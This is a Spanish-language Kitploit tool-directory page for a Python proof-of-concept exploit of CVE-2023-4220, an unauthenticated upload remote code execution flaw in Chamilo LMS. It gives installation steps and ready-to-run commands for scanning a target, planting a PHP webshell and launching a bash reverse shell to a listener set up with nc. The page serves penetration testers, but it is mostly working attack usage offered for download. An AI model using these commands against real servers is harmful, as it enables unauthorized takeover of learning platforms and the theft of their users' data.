Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-4220-Chamilo-LMS — Este es un script escrito en Python que permite la explotación de la falla de seguridad del software LMS Chamilo descrita en CVE-2023-4220 | Kitploit
Herramientas/GitHubGitHub/rai2en/cve-2023-4220-chamilo-lms
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubrai2en/cve-2023-4220-chamilo-lms

CVE-2023-4220-Chamilo-LMS

Este es un script escrito en Python que permite la explotación de la falla de seguridad del software LMS Chamilo descrita en CVE-2023-4220

Ver Repositorio
521hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Chamilo LMS Vulnerabilidad RCE por Carga Masiva No Autenticada PoC

Este script permite la explotación de la falla de seguridad del software Chamilo LMS descrita en CVE-2023-4220. El sistema es vulnerable en versiones anteriores a 1.11.24.

Uso

Clona el repositorio en tu máquina e instala las dependencias usando pip (se recomienda usar virtualenv para crear un entorno que separe estas instalaciones de las instalaciones globales)

root@kitploit:~
git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
cd chamilo-lms-unauthenticated-big-upload-rce-poc
pip install -r requirements.txt

El script necesita la URL objetivo con la ruta raíz de Chamilo (como http://example.com/chamilo, http://example.com o http://chamilo.example.com) y una acción a realizar (hay tres disponibles: scan, webshell y revshell).

Escaneo

Esta acción verificará si el objetivo es vulnerable al intentar acceder al endpoint /main/inc/lib/javascript/bigupload/files/.

root@kitploit:~
python3 main.py -u http://example.com/chamilo -a scan

scan-demo

Webshell

Esta acción creará un archivo webshell PHP en el endpoint vulnerable.

root@kitploit:~
python3 main.py -u http://example.com/chamilo -a webshell

webshell-demo

Revshell

Esta acción creará y ejecutará un archivo bash reverse shell. Para ello, primero se creará un webshell usando el mismo método que en la acción anterior. Después, se ejecutarán algunos comandos para crear y ejecutar el archivo bash. Asegúrate de estar escuchando en el puerto que definiste con nc o cualquier otra utilidad para recibir la conexión inversa. Además, el host puede ser una IPv4 interna/pública válida (como 172.17.1.4 o 186.227.4.31) o el dominio que hayas registrado (como evil-vps.domainreg.net)

root@kitploit:~
python3 main.py -u http://example.com/chamilo -a revshell

revshell-demo

OBS: Pronto agregaré una opción de payload Windows para hosts Windows

Referencias

(CVE-2023-4220) Chamilo LMS - Ejecución Remota de Código por Carga Masiva de Archivos No Autenticada

Descargar herramienta